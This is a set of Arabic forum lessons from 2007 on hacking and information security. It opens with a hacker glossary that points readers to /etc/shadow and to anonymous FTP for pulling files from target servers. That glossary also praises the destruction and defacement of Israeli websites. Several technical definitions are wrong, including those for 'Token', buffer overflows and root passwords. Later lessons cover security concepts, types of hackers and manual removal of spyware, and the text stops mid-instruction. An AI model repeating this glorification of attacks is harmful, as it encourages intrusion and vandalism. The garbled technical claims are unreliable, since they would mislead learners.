اكسبلويت (Exploits):- هي برامج تنفيذية تنفذ من خلال المتصفح . و لها عنوان
URL ، تقوم هذه الإكسبلويتات بعرض ملفات الموقع و تقوم بعضها بالدخول الى
السيرفر و التجول فيه ، كما توجد اكسبلويتات تقوم بشن هجوم على بورت معين
في السيرفر لعمل كراش له ، و هذا ما يسمى بـ Buffer Over Flow Exploits .
هناك أنواع من الإكسبلويت ، فمنها ال CGI Exploits أو ال CGI Bugs و منها
ال Unicodes Exploits و منها ال ، Buffer Over Flow Exploits ، و منها
ال PHP Exploits ،و منها الDOS Exploits و التي تقوم بعملية حجب الخدمة
للسيرفر إن وجد فيها الثغرة المطلوبة لهذا الهجوم و ان لم يكن على السيرفر
أي فايروول Fire Wall . و هناك بعض الإكسبلويتات المكتوبة بلغة السي و يكون
امتدادها (.c) .
هذه الإكسبلويتات بالذات تحتاج الى كومبايلر او برنامجا لترجمتها و تحويها
أي الاكسبلويت الى اكسبلويت تنفيذي عادي يستخدم من خلال المتصفح ، و لتحويل
الإكسبلويت المكتبو بلغة السي هذه الى برنامجا تنفيذيا ، نحتاج إما الى
نظام التشغيل لينوكس او يونكس ، او الى اي كومبايلر يعمل ضمن نظام التشغيل
ويندوز . أشهر هذه الكومبايلرات ( المترجمات أو المحولات ) برنامج اسمه
Borland C++ Compiler و هي تعمل تحت نظام التشغيل ويندوز كما ذكرنا سابقا.
----------------------------------------------------------------------

الجدار الناري FireWall:- هي برامج تستعملها السيرفرات لحمايتها من الولوج
الغير شرعي لنظام ملفاتها من قبل المتطفلين . هي تمثل الحماية للسيرفر طبعا ،
و لكني أنوه بأن الفايروولات المستخدمة لحماية السيرفرات ( المواقع ) تختلف
عن تلك التي تستخدم لحماية الأجهزة .
----------------------------------------------------------------------

Token:- هو ملف الباسورد المظلل (Shadowed Passwd) و الذي يكون فيه الباسورد
على شكل * أو x أي Shadowed . إن وجدت ملف الباسورد مظللا ، فيجب عليك حينها
البحث عن ملف الباسورد الغير المظلل و الذي يسمى Shadow file . تجده في
/etc/shadow .
----------------------------------------------------------------------

Anonymouse:- هي الوضعية الخفية و المجهولة التي تدخل فيها الى الموقع المراد
اختراقه. هناك خاصية في برامج الاف تي بي بنفس الإسم ، تستطيع ان تستعملها
في الدخول المجهول الى السيرفر و سحب الملفات منه .
----------------------------------------------------------------------

Valnerableties:- أي الثغرات أو مواضع الضعف الغير محصنة أو القابلة للعطب
و التي يعاني منها السيرفر و التي قد تشكل خطرا أمنيا عليه مما يؤدي الى
استغلالها من قبل الهاكرز في مهاجمة السيرفر و اختراقه أو تدميره .
ما هي مفردها ؟ ، Valnerable أي ثغرة أو بالأصح موضع الضعف و المكان
الغير مؤمن بشكل سليم . و تكثر هذه الكلمة في القوائم البريدية للمواقع المهتمة
بالسيكيوريتي و أمن الشبكات و غيرها كالقائمة البريدية الموجودة في موقع
Security Focus أو بوق تراك او غيرها .
----------------------------------------------------------------------

passwd file : هو الملف الذي يحتوي على باسورد الروت و باسوردات الأشخاص
المصرح لهم بالدخول الى السيرفر . باسورد الموقع موجود في نفس الملف طبعا.
----------------------------------------------------------------------

الجذر أو الـ root : و هو المستخدم الجذري و الرئيسي للنظام ، له كل الصلاحيات
في التعامل مع ملفات الموقع و السيرفر من إزالة أو اضافة أو تعديل للملفات.
غالبا ما يكون باسورد الروت هو باسورد الموقع نفسه في المواقع التي تعمل ضمن
نظام التشغيل لينوكس او يونكس و سولاري و فري بي اس دي و غيرها .
----------------------------------------------------------------------

السيرفر Server: هو الجهاز المستضيف للموقع ، اذ أن كل ملفات الموقع توضع فيه
فهو جهاز كمبيوتر عاد كغيره من الأجهزة لكنه ذو امكانيات عالية ككبر حجم القرص
الصلب و سرعته الهائلة ، و هو متصل بالإنترنت 24 ساعة ، و هذا هو سبب كون
المواقع شغالة 24 على الإنترنت . قد يملك و يستضيف السيرفر أكثر من موقع
واحد، و هذا يعتمد من سيرفر لآخر و من شركة لأخرى. ضربة الهاكرز طبعا هي اختراق
السيرفر الذي يملك الكثير من المواقع ، فيسهل حينها اختراق جميع المواقع التي
تندرج تحته مما يؤدي إما الى تدميرها أو العبث في ملفاتها أو تشويه واجهتها أو
سرقة بياناتها و تدميرها أو مسحها من النت تماما ، و هذا ما يحدث للمواقع
الإسرائيلية و بكثرة و لله الحمد . - جزاكم الله خيرا أيها المجاهدون - .
-----------------------------------------------------------------------

بوفر أوفر فلو ( Buffer over Flow ) : و هي نوع من أنواع الاكسبلويتات التي
تستعمل لشن هجوم الطفح على نقطة معينة من السيرفر مثل الهجوم على بورت الإف تي بي
أو غيره لأجل اضعاف اتصال السيرفر و فصل اتصاله بهذا بهذا البورت و لالغاء الرقعة
الموجودة بها كي يتم استغلالها مجددا - بعد عمل الكراش لها طبعا - يتم استغلالها
في معاودة الإتصال لها و بسهولة و دون وجود أي رقع او حواجز و سحب البيانات منها .
و هي شبيهة نوعا ما بعملية حجب الخدمة - DOS - اذ أنها تقوم بعملية اوفر لود على
جزء مركز من السيرفر .

Linux Root
, Tue, 26 Jun 2007 23:41:40 +0200
الدرس التاسع والعشرون
أمن المعلومات ضرورة أم ترف







يشكل أمن المعلومات في الوقت الراهن حجر الزاوية فى نهضة تكنولوجيا المعلومات والاتصالات ... فمن المعروف أن المسافة المتاحة للخصوصية تتناسب عكسيا مع التقدم التكنولوجى لأدوات المعلوماتية والاتصالات.. لذا, فإنه من المفترض أن بناء تكنولوجيا وطنية لأمن المعلومات والاتصالات قد يسمح بعضوية دائمة فى مجلس الأمن التكنولوجى! ...وللتبسيط نتناول هذه الأسئلة:


ما هو الأمن?
حماية أصول وموارد نظام ما بطرق مشروعة, كذلك هو أداة تنظيم العلاقات والاتصالات داخل النظام دون أن يؤثر على قدرة مستخدمي النظام على الأداء. وهو لا يمنع الجريمة أو الاختراق نهائيا, ولكن كلما كان النظام الأمني قوىا ودقيقا كان الاختراق والجريمة في أحد الصور الآتية:
1- مكلفة, بمعنى أن تكون تكاليف الاقتحام أو الاختراق باهظة .
2- تحتاج إلى وقت طويل يمكن خلاله اكتشاف المخترق. 3- تحتاج إلى وقت طويل مما سهل اكتشافها





ما هى أنواع الشبكات التي قد تحتاج إلى تأمين?

الشبكات الداخلية: محلية مثل LAN
الشبكات الخارجية: دولية مثل WAN
الشبكات الخاصة: مغلقة مثل Intranet

هل هناك أنواع أخرى من الأمن?
أولا: أمن المعلومات: Information Security
1- المعلومات
2- أمن مخازن المعلومات

ثانيا: أمن الوصول إلى الأنظمة :Access Control
1- التحكم في الدخول
2- التحكم في عدة مستويات
3- التحكم فى التطبيقات

ثالثا: أمن البرمجيات Software Security
1- تأمين ضد القرصنة للبرمجيات
2- التأمين ضد السطو على قواعد البيانات
3- التأمين لأهداف قومية

رابعا: أمن الاتصالات Communications Security
أ- السلكي:
1- الخطوط التليفونية
2- خطوط وكوابل النقل
3- أجهزة النقل
4- محطة الاتصالات

ب- اللاسلكي:
1- المستقل
2- الملحق بأجهزة أخرى

ما هى التهديدات التي تواجه المستخدم?
* التهديدات الرقمية:
1- الفيروس: هو أداة إفساد وإضرار.
2- الدودة: وهى أداة تعطيل فقط.
3- حصان طروادة: وهو أداة للإضرار والسيطرة على المعلومات.

* الاختراق:
1- اختراق المعلومات الثابتة.
2- اختراق المعلومات المتحركة أو المنقولة.

ما هي أغراض الاختراق?
1- اللهو.
2- التعطيل.
3- التخريب والتدمير.
4- التجسس (والحصول على الأكواد والشفرات)
5- السطو على الأموال.

ما هي الجريمة الإلكترونية ?
هي جريمة القرن الجديد المسايرة للتطور الهائل في تكنولوجيا المعلومات والاتصالات, حيث تعتبر شبكة الإنترنت هي أكبر شبكة في تاريخ البشرية وهى أحدث أدوات العالم لربط أكثر من 500 مليون جهاز كمبيوتر في أكثر من 200 دولة ويستخدمها أكثر من مليار مشترك والجريمة الإلكترونية هي صراع بين التقدم التكنولوجي وحماية وأمن الخصوصية. حيث لم تعد الآن عملية سرقة مصرف تجارى تتطلب أسلحة ولكن تحتاج إلى معرفة بالتقنية الحديثة والشبكات الإلكترونية والشفرات وأنظمة التحويل المالي.
والجريمة الإلكترونية تبدأ من عمليات الاقتناص لأرقام الحسابات, وبطاقات الائتمان, إلى التخريب في المواقع, ونشر الصور الإباحية, والمواقع الكاذبة, وغسيل الأموال, والتجسس . الخ.

ما هو حجم الجريمة الإلكترونية?
يقال أن السرقات السنوية وصلت إلى أكثر من مليوني حالة بالإضافة إلى مئات الآلاف من الشركات التي وقعت ضحية القراصنة والمتلصصين, وذلك بسبب الخلل وعدم الأحكام في وسائل الأمن لدى المواقع الإلكترونية والتي يجب سدها في أسرع وقت,حيث أنه من المتوقع أن تتضاعف هذه الأرقام.

هل هناك أمثلة ونماذج للجريمة الإلكترونية?
مصر: اك تشفت عملية ابتزاز عن طريق الإنترنت بتهديد المسئولين بإحدى الشركات المنتجة للمياه الغازية بطلب مبلغ من المال مقابل عدم نشر صورة زجاجة بها صرصار, ادعاء أنها من إنتاج الشركة وبالفعل نفذ التهديد وشاهد الصورة حوالي 3700 مشاهد وتم ضبطه واعترف بالواقعة.
كذلك كشف تقرير من بنك إلى النيابة العامة عن حادث سرقة أرصدة رجل أعمال مصري عن طريق الفيزا كارت الخاصة بالبنك وقد أكدت التحريات أن مرتكبي الحادث اشتريا بضائع أمريكية عبارة عن ملابس تقدر بحوالي 12 ألف دولار.
أمريكا:كشفت تحريات وكالة التحقيق الفيدرالية الأمريكية هذا العام عن مليون حالة سرقة لأرقام بطاقات الائتمان الواردة بموقع 40 شركة أمريكية تمارس نشاطها عبر الإنترنت وقد استخدموا الابتزاز مع الشركات إما نشر بيانات العملاء أو دفع مبالغ نقدية كبيرة. ويعتقد أنه تم بيع معظم البيانات المسروقة لعصابات الجريمة المنظمة. ويصف ال- FBI هذه العملية بأنها اكبر عملية في تاريخ الشبكة. كذلك أعلنت هيئة النقل البرى الأمريكية أن متسللين صينيين أصابوا نظامها الكمبيوتري بالعطب وذلك في سياق احتجاج على حادث طائرة التجسس وقد وافق ذلك أيضا الذكرى الثانية لقصف الطائرات الأمريكية للسفارة الصينية في بلجراد.
بريطانيا:ماكينات الصرف الآلي, تم السطو عليها مما كبدها خسائر فادحة وصلت إلى 15 مليون جنيه إسترليني من 33 ألف ماكينة خلال عام 2000 .

من هم القراصنة?
إن معظم المتسببين في عمليات القرصنة هم أصلا مبرمجون لديهم دوافع نفسية غير سوية كأنه يقول "أنا هنا ألا تشعرون بي".
ونستطيع تقسيم هؤلاء المؤلفين أو القراصنة إلى ثلاثة أنواع:
1) ذوو القبعات البيضاء: الذين يهاجمون أجهزة الكمبيوتر بطريقة شرعية وبأوامر من السلطة وبهجمات مخططة وينظمون الهجوم عندما يطلب منهم.
2) ذوو القبعات الرمادية: أحيانا يقومون بالمهمة كقراصنة أشرار وأحيانا لهدف آخر. وبعضهم يؤمنون بنظرية "حرية المعلومات أيا كانت هذه المعلومات" بما فيها التي تتعلق بتأمين الأجهزة والشبكات ومعرفة نقاط الضعف.. ولا يرون غضاضة في الهجوم على أي موقع من أجل المزيد من إجراءات الأمن والوقاية.
3) ذوو القبعات السوداء: يهاجمون بهدف سطو مالى أو معلوماتى ضار.
كذلك يجب التفرقة بين نوعين هما Hackers وCrackers فأما Hackers فتكون أفعالهم إما من خلال الهواية أو العمل أصلا لتخريب مواقع هامة أو شراء بعض المنتجات والبرامج بطرق ملتوية, وأيضا الحصول على معلومات هامة من أماكن مختلفة وأخطرهم صانعو الفيروسات وملفات كسر الحماية حيث أنهم مبرمجون متخصصون ذوو قدرات عالية جدا, أما Crackers فهو مستخدم عادى أو هاوي لديه القدرة على البرمجة والبحث الجيد على صفحات الإنترنت للوصول إلى ملفات كسر الحماية بغرض استعمالها وأيضا يكون من أصحاب النسخ غير القانوني للبرامج.

من هو المتهم في الجريمة الإلكترونية ?
1- مهاجم محترف من خارج الكيان.
2- عميل من داخل الكيان.
3- مهاجم محترف من داخل الكيان.
4- مجهول محترف. 5- مجهول هاوي.






ما هي الطبقات الأمنية?

1- الأمن الطبيعي.
2- أمن الوصول.
3- التشفير.
4- الأمن الإلكتروني (الأمن عن بعد).

لماذا هذه الطبقات الأمنية?
كان من المعروف أن كسر الأمن الطبيعي هو انتهاك أمن شبكة أو نظام من مستخدم قانوني للشبكة أو النظام.
و الآن أصبح هناك وسائل الاختراق البسيط عن بعد مثل الفيروسات والديدان وكلها تعمل مستقلة عن الجهة التي زرعتها, وهناك أنواع اختراق عن بعد تظل على اتصال بالجهة التي زرعتها (وهى الأخطر) مثل حصان طروادة... وفى كل الأحوال فإن هذه الأنواع عبارة عن جزء من شفرة تلحق ببرنامج أو ملف أو مكان شرعي...وبالتأكيد هناك أنواع أخرى ...!! لذلك فقد يحتاج الأمن الطبيعي إلى طبقة أمنية أخرى مثل أمن الوصول . وبالطبع, فإن أمن الوصول قد يفرض قيودا أمنية أخرى على النظام, منها قيود زمنية أو قيود مكانية مثل:
1- فرض زمن معين للدخول وبعده يتم إلغاء كلمة السر.
2- عدم الدخول من مكان غير مصرح به لشخص قانوني .
3- إعطاء فرصة ثلاثة أخطاء في كلمة السر ثم الإلغاء.
4- إلغاء العمل عند ترك النقطة أو العقدة (الجزء المتصل بالنظام) لمدة محدده حيث يتم الإيقاف الأتوماتيكي Auto - logoff.
5- غيرها.
وفى كثير من الاحيان يتم اللجوء إلى سياسة تحديد المستخدم Identification وتوثيق الاستخدام Authentication:

عناصر تحديد المستخدم:
- كلمة المرور
- بصمة الصوت
- بصمة الإصبع / الكف
- شبكية العين
- غيرها

عناصر توثيق الاستخدام:
- كلمة السر
- معلومات إضافية تطلب من المستخدم
- غيرها
وفي التطبيقات الأكثر حساسية, مثل البنوك قد يكون مطلوب أكثر من كلمة سر أو شفرة لتوثيق ونقل الأموال من بنك إلي آخر أو من حساب إلى آخر. ويعيب هذه الطريقة أن على المستخدم أن يتذكر أو يكتب في مكان ما كل كلمات السر المتعددة, وكذلك عليه أن يحفظ ترتيب الدخول باستخدامها.
وهناك طريقة أخرى تخول للمستخدم الوصول إلى مستويات مختلفة من النظام مثل:
1- قراءة الملفات فقط.
2- الكتابة على الملفات.
3- تنفيذ الأوامر على الملف.
4- إلغاء الملفات.
ويعيب هذه الطريقة أيضا احتياجها لنظام مطابقة مركزي مما يتطلب سعة تخزينية كبيرة قد تزيد من احتمالات الاختراق.
ومع الإمكانيات الأخرى للاختراق عبر البرمجيات كبيرة الحجم وعبر منافذ الشبكة الدولية فقد ظهرت طبقة التشفير.

ما هو التشفير?
جعل البيانات غير مفهومة (بدون مفتاح الشفرة).

مفتاح التشفير:
ويتطلب تحديده عناصر عديدة منها:
الإنشاء - التوزيع - التخزين - الحماية - الاسترداد - معايير الأداء.

معايير تشفير البيانات:
معايير تشفير البيانات هى وسائل قياسية تحددها جهات متعددة, مثل
DES (Data Encryption Standards) وهناك العديد من الأنواع الأخرى المعروفة وغير المعروفة.
ما هي أمثلة مفاتيح التشفير?
1- المفتاح العام والمفتاح الخاص.
2- مفتاح الباب الخلفي.
3- المفتاح السري.
4- شريحة كليبر.
5- غيرها.

ما هي وسائل التراسل غير الآمنة التي قد تحتاج إلى تشفير?
- الراديو أو اللاسلكي.
- الخطوط الموصلة بين المرسل والمرسل إليه في أي شبكة.
- الحاسبات الآلية (مراكز الإرسال والاستقبال).
إن تحويل نص غير مشفر Plain Text إلى نص مشفر Cipher Text يحتاج إلى مفتاح الشفرة. ويعد تحويل نص الشفرة إلى نص غير مشفر بدون مفتاح التشفير أمرا صعبا ويتوقف مدى الصعوبة على عناصر عديدة منها:
1- المفتاح.
2- أدوات وأجهزة التشفير.
3- عناصر أخرى.

ولكن هل التشفير هو نهاية المطاف ?
والإجابة لا.
حيث أن الكلام عن الأمن الإلكتروني ( الأمن عن بعد) اصبح حقيقة وليس مجرد خيال علمي يختلف البعض على صياغته في المسلسلات والأفلام !!!
والخلاصة أن معظم وسائل الأمن المعروفة هي وسائل تأخير, منها البدائي ومنها المتقدم ومنها المتطور باستمرار ولأن معظم صناع وسائل الحماية يعتمدون على النظم والبرمجيات فإنهم دائما يقولون أن الناس هم أضعف وصلة أمن !!!

Linux Root
, Tue, 26 Jun 2007 23:43:17 +0200
الدرس الثلاثون
تعريف الأختراق

الإختراق بشكل عام هو القدرة على الوصول لهدف معين بطريقة غير مشروعة عن طريق ثغرات في نظام الحماية الخاص بالهدف وبطبيعة الحال هي سمة سيئة يتسم بها المخترق لقدرته على دخول أجهزة الأخرين عنوه ودون رغبة منهم وحتى دون علم منهم بغض النظر عن الأضرار الجسيمة التي قد يحدثها سواء بأجهزتهم الشخصية او بنفسياتهم عند سحبة ملفات وصور تخصهم وحدهم . ما الفرق هنا بين المخترق للأجهزة الشخصية والمقتحم للبيوت المطمئنة الآمنه ؟؟ أرائيتم دناءة الأختراق وحقارته.
أسباب الإختراق ودوافعه
لم تنتشر هذه الظاهرة لمجرد العبث وإن كان العبث وقضاء وقت الفراغ من أبرز العوامل التي ساهمت في تطورها وبروزها الي عالم الوجود . وقد أجمل المؤلفين الثلاثة للمراجع التي استعنت بها في هذة الدروة الدوافع الرئيسية للأختراق في ثلاث نقاط اوجزها هنا على النحو التالي :
1- الدافع السياسي والعسكري: ممالاشك فيه أن التطور العلمي والتقني أديا الي الأعتماد بشكل شبة كامل على أنظمة الكمبيوتر في أغلب الاحتياجات التقنية والمعلوماتية. فمنذ الحرب البارردة والصراع المعلوماتي والتجسسي بين الدولتين العظميين على أشده. ومع بروز مناطق جديده للصراع في العالم وتغير الطبيعة المعلوماتيه للأنظمة والدول ، اصبح الأعتماد كليا على الحاسب الألي وعن طريقة اصبح الاختراق من اجل الحصول على معلومات سياسية وعسكرية واقتصادية مسالة أكثر أهمية.
2- الدافع التجاري: من المعروف أن الشركات التجارية الكبرى تعيش هي ايضا فيما بينها حربا مستعرة ( الكوكا كولا والبيبسي كولا على سبيل المثال) وقد بينت الدراسات الحديثة أن عددا من كبريات الشركات التجارية يجرى عليها أكثر من خمسين محاولة إختراق لشبكاتها كل يوم.
3- الدافع الفردي: بداءت اولى محاولات الأختراق الفردية بين طلاب الجامعات بالولايات المتحدة كنوع من التباهي بالنجاح في إختراق اجهزة شخصية لأصدقائهم ومعارفهم ومالبثت أن تحولت تلك الظاهرة الي تحدي فيما بينهم في اختراق الأنظمة بالشركات ثم بمواقع الأنترنت. ولايقتصر الدافع على الأفراد فقط بل توجد مجموعات ونقابات اشبة ماتكون بالأنديه وليست بذات أهداف تجارية. بعض الأفراد بشركات كبرى بالولايات المتحدة ممن كانوا يعملون مبرمجين ومحللي نظم تم تسريحهم من اعمالهم للفائض الزائد بالعمالة فصبوا جم غضبهم على انظمة شركاتهم السابقة مفتحمينها ومخربين لكل ماتقع ايديهم علية من معلومات حساسة بقصد الأنتقام . وفي المقابل هناك هاكرز محترفين تم القبض عليه بالولايات المتحدة وبعد التفاوض معهم تم تعيينهم بوكالة المخابرات الأمريكية الس أي اي وبمكتب التحقيقات الفيدرالي الأف بي أي وتركزت معظم مهماتهم في مطاردة الهاكرز وتحديد مواقعهم لأرشاد الشرطة اليهم .
أنواع الأختراق
يمكن تقسيم الإختراق من حيث الطريقة المستخدمة الي ثلاثة أقسام:
1- إختراق المزودات او الأجهزة الرئيسية للشركات والمؤسسات او الجهات الحكومية وذلك بأختراق الجدران النارية التي عادة توضع لحمايتها وغالبا مايتم ذلك باستخدام المحاكاة Spoofing وهو مصطلح يطلق على عملية إنتحال شخصية للدخول الي النظام حيث أن حزم الـ IP تحتوي على عناوين للمرسل والمرسل اليه وهذة العناوين ينظر اليها على أنها عناوين مقبولة وسارية المفعول من قبل البرامج وأجهزة الشبكة . ومن خلال طريقة تعرف بمسارات المصدر Source Routing فإن حزم الـ IP قد تم اعطائها شكلا تبدو معه وكأنها قادمة من كمبيوتر معين بينما هي في حقيقة الأمر ليست قادمة منه وعلى ذلك فإن النظام إذا وثق بهوية عنوان مصدر الحزمة فإنه يكون بذلك قد حوكي (خدع) وهذة الطريقة هي ذاتها التي نجح بها مخترقي الهوت ميل في الولوج الي معلومات النظام قبل شهرين.
2- إختراق الأجهزة الشخصية والعبث بما تحوية من معلومات وهي طريقة للأسف شائعة لسذاجة اصحاب الأجهزة الشخصية من جانب ولسهولة تعلم برامج الأختراقات وتعددها من جانب اخر.
3- التعرض للبيانات اثناء انتقالها والتعرف على شيفرتها إن كانت مشفرة وهذة الطريقة تستخدم في كشف ارقام بطاقات الأئتمان وكشف الأرقام السرية للبطاقات البنكيه ATM وفي هذا السياق نحذر هنا من امرين لايتم الأهتمام بهما بشكل جدي وهما عدم كشف ارقام بطاقات الأئتمان لمواقع التجارة الألكترونية إلا بعد التأكد بألتزام تلك المواقع بمبداء الأمان . أما الأمر الثاني فبقدر ماهو ذو أهمية أمنية عالية إلا أنه لايؤخذ مأخذ الجديه . فالبعض عندما يستخدم بطاقة السحب الألي من مكائن البنوك النقدية ATM لاينتظر خروج السند الصغير المرفق بعملية السحب او انه يلقي به في اقرب سلة للمهملات دون ان يكلف نفسه عناء تمزيقة جيدا . ولو نظرنا الي ذلك المستند سنجد ارقاما تتكون من عدة خانات طويله هي بالنسبة لنا ليست بذات أهمية ولكننا لو أدركنا بأن تلك الأرقام ماهي في حقيقة الأمر الا إنعكاس للشريط الممغنط الظاهر بالجهة الخلفية لبطاقة الـ ATM وهذا الشريط هو حلقة الوصل بيننا وبين رصيدنا بالبنك الذي من خلالة تتم عملية السحب النقدي لأدركنا اهمية التخلص من المستند الصغير بطريقة مضمونه ونقصد بالضمان هنا عدم تركها لهاكر محترف يمكنه استخراج رقم الحساب البنكي بل والتعرف على الأرقام السرية للبطاقة البنكية ATM .
اثار الأختراق:
1- تغيير الصفحة الرئيسية لموقع الويب كما حدث لموقع فلسطيني مختص بالقدس حيث غير بعض الشباب الإسرائيلي الصور الخاصة بالقدس الي صور تتعلق بالديانه اليهودية بعد عملية إختراق مخطط لها.
2- السطو بقصد الكسب المادي كتحويل حسابات البنوك او الحصول على خدمات مادية او اي معلومات ذات مكاسب مادية كأرقام بطاقات الأئتمان والأرقام السرية الخاصة ببطاقات الـ ATM 3- إقتناص كلمات السر التي يستخدمها الشخص للحصول على خدمات مختلفة كالدخول الي الانترنت حيث يلاحظ الضحية ان ساعاته تنتهي دون ان يستخدمها وكذلك انتحال شخصية في منتديات الحوار كما حدث للأخت الدانه بهذة الساحة. والأن وبعد هذة العجالة هل فكرتم بخطورة الاختراق ؟! هل خطر على احدكم بأن جهازة قد اخترق ؟؟ وكيف له أن يعرف ذلك قبل أن يبداء التخلص من ملفات التجسس ؟ هذة الأمور وامور أخرى تهمنا جميعا سنتطرق اليها في الدروس القادمة

Linux Root
, Tue, 26 Jun 2007 23:44:26 +0200
الدرس الواحد والثلاثين
تعريف الهاكر
أطلقت هذة الكلمة اول ما أطلقت في الستينيات لتشير الي المبرمجين المهرة القادرين على التعامل مع الكمبيوتر ومشاكله بخبرة ودراية حيث أنهم وكانوا يقدمون حلولا لمشاكل البرمجة بشكل تطوعي في الغالب .
بالطبع لم تكن الويندوز او مايعرف بالـ Graphical User Interface او GUI قد ظهرت في ذلك الوقت ولكن البرمجة بلغة البيسيك واللوغو والفورتوران في ذلك الزمن كانت جديرة بالأهتمام . ومن هذا المبداء غدى العارفين بتلك اللغات والمقدمين العون للشركات والمؤسسات والبنوك يعرفون بالهاكرز وتعني الملمين بالبرمجة ومقدمي خدماتهم للأخرين في زمن كان عددهم لايتجاوز بضع الوف على مستوى العالم أجمع. لذلك فإن هذا الوصف له مدلولات إيجابية ولايجب خلطه خطأ مع الفئة الأخرى الذين يسطون عنوه على البرامج ويكسرون رموزها بسبب إمتلاكهم لمهارات فئة الهاكرز الشرفاء. ونظرا لما سببته الفئة الأخيرة من مشاكل وخسائر لا حصر لها فقد أطلق عليهم إسما مرادفا للهاكرز ولكنه يتداول خطأ اليوم وهو (الكراكرز) Crackers. كان الهاكرز في تلك الحقبة من الزمن يعتبرون عباقرة في البرمجة فالهاكر هو المبرمج الذي يقوم بتصميم أسرع البرامج والخالي في ذات الوقت من المشاكل والعيوب التي تعيق البرنامج عن القيام بدورة المطلوب منه. ولأنهم كذلك فقد ظهر منهم إسمان نجحا في تصميم وإرساء قواعد أحد البرامج المستخدمة اليوم وهما دينيس ريتشي وكين تومسون اللذان نجحا في اواخر الستينيات في إخراج برنامج اليونيكس الشهير الي حيز الوجود. لذلك فمن الأفضل عدم إطلاق لقب الهاكر على الأفراد الذين يدخلون عنوة الي الأنظمة بقصد التطفل او التخريب بل علينا إطلاق لقب الكراكرز عليهم وهي كلمة مأخوذة من الفعل Crack بالأنجليزية وتعني الكسر او التحطيم وهي الصفة التي يتميزون بها .
أنواع الكراكرز
قد لايستصيغ البعض كلمة كراكرز التي ادعو بها المخربين هنا لأنه تعود على كلمة هاكرز ولكني سأستخدمها لأعني به المخربين لأنظمة الكمبيوتر وهم على كل حال ينقسمون الي قسمين :
1- المحترفون: هم إما أن يكونوا ممن يحملون درجات جامعية عليا تخصص كمبيوتر ومعلوماتية ويعملون محللي نظم ومبرمجين ويكونوا على دراية ببرامج التشغيل ومعرفة عميقة بخباياها والثغرات الموجودة بها. تنتشر هذة الفئة غالبا بأمريكا وأوروبا ولكن إنتشارهم بداء يظهر بالمنطقة العربية (لايعني هذا أن كل من يحمل شهادة عليا بالبرمجة هو باي حال من الأحوال كراكر) ولكنه متى ما إقتحم الأنظمة عنوة مستخدما اسلحته البرمجية العلمية في ذلك فهو بطبيعة الحال احد المحترفين.
2- الهواه: إما أن يكون احدهم حاملا لدرجة علمية تساندة في الأطلاع على كتب بلغات أخرى غير لغته كالأدب الإنجليزي او لديه هواية قوية في تعلم البرمجة ونظم التشغيل فيظل مستخدما للبرامج والتطبيقات الجاهزة ولكنه يطورها حسبما تقتضيه حاجته ولربما يتمكن من كسر شيفرتها البرمجية ليتم نسخها وتوزيعها بالمجان. هذا الصنف ظهر كثيرا في العامين الأخرين على مستوى المعمورة وساهم في إنتشارة عاملين . الأول: إنتشار البرامج المساعدة وكثرتها وسهولة التعامل معها . والأمر الثاني: إرتفاع اسعار برامج وتطبيقات الكمبيوتر الأصلية التي تنتجها الشركات مما حفز الهواة على إيجاد سبل أخرى لشراء البرامج الأصلية بأسعار تقل كثيرا عما وضع ثمنا لها من قبل الشركات المنتجه.
ينقسم الهواة كذلك الي قسمين :
1- الخبير: وهو شخص يدخل للأجهزة دون الحاق الضرر بها ولكنه يميل الي السيطرة على الجهاز فتجده يحرك الماوس عن بعد او يفتح مشغل الأقراص بقصد السيطرة لا أكثر .
2- المبتدي: هذا النوع أخطر الكراكرز جميعهم لأنه يحب أن يجرب برامج الهجوم دون أن يفقه تطبيقها فيستخدمها بعشوائية لذلك فهو يقوم أحيانا بدمار واسع دون أن يدري بما يفعله.
الكراكرز بالدول العربية:
للأسف الشديد كثير من الناس بالدول العربية يرون بأن الكراكرز هم أبطال بالرغم أن العالم كلة قد غير نظرته لهم. فمنذ دخول خدمة الأنترنت للدول العربية في العام 1996 تقريبا والناس يبحثون عن طرق قرصنه جديدة وقد ذكرت اخر الحصائيات بأن هناك اكثر من 80% من المستخدمين العرب تحتوي اجهزتهم على ملفات باتش وهي ملفات تسهل عمل الكراكرز ( ساشرح في نهاية هذا الجزء ثلاث طرق إختبارية للكشف عن ملفات الباتش بالأجهزة الشخصية).
الكراكرز بدول الخليج العربي :
إنتشرت ثقافة الكراكرز كثيرا بدول الخليج العربي خصوصا بالسعودية على رغم دخولها المتأخر لخدمة الأنترنت (يناير 1999) حيث كثرت الشكاوي من عدة افراد وشركات وقد بين الأستبيان الذي أجرته مجلتين عربيتين متخصصتين هما بي سي و إنترنت العالم العربي أن بعض الأجهزة بالدول الخليجية تتعرض لمحاولات إختراق مرة واحدة على الأقل يوميا.
إختبار الكشف عن ملفات التجسس Patch Files :
توجد طرق عديدة لإكتشاف وجود ملفات يمكن من خلالها تضييق الخناق على ملفات التجسس في حال إكتشافها والتخلص منها نهائيا لقطع الطريق على الكراكرز
المتصل بجهاز الضحية وهي على النحو التالي :
الطريقة الأولي : بواسطة ملف تسجيل النظام Registry :
1- أنقر على إبداء Start
2- أكتب في خانة التشغيل Run الأمر : rigedit
3- إفتح المجلدات التالية حسب الترتيب في قائمة Registery Editor :
- HKEY_LOCAL_MACHINE
- Software
- Microsoft
- Windows
- Current Version
- Run
4- والآن من نافذة تسجيل النظام Registry Editor انظر الي يمين النافذة بالشاشة المقسومة ستشاهد تحت قائمة Names أسماء الملفات التي تعمل مع قائمة بدء التشغيل ويقابلها في قائمة Data عنوان الملف .
5- لاحظ الملفات جيدا فإن وجدت ملف لايقابلة عنوان بالـ Data او قد ظهر امامة سهم صغير <--- فهو ملف تجسس إذ ليس له عنوان معين بالويندوز.
6- تخلص منه بالضغط على الزر الأيمن للفارة ثم Delete
--------------------------
الطريقة الثانية بواسطة الأمر :msconfig
1- انقر ابداء Start
2- اكتب في خانة التشغيل Run الأمر التالي : msconfig
3- سوف تظهر لك نافذة System Configuration Utility أختر لسان التبويب Start up
4- ستظهر لك شاشة تعرض البرامج التي تبداء العمل مباشرة مع بدء التشغيل
5- إفحص هذة البرامج جيدا بالنظر فإن شككت بوجود برامج غريبة لم تقم أنت بتثبيتها بجهازك فقم بالغاء الإشارة الظاهرة بالمربع الصغير المقابل له فتكون بذلك قد اوقفت عمل البرنامج التجسسي او غيره من البرامج الغير مرغوب بها.
--------------------------
الطريقة الثالثة بواسطة الدوس Dos:
هذة الطريقة كانت تستخدم قبل ظهور الويندوز وهي من اسهل الطرق :
1- إفتح الدوس من محث MSDos بقائمة إبداء
2- أكتب الأمر التالي : C:/Windowsdir patch.*
3- إن وجدت ملف الباتش فقم بمسحة بالطريقة التالية:
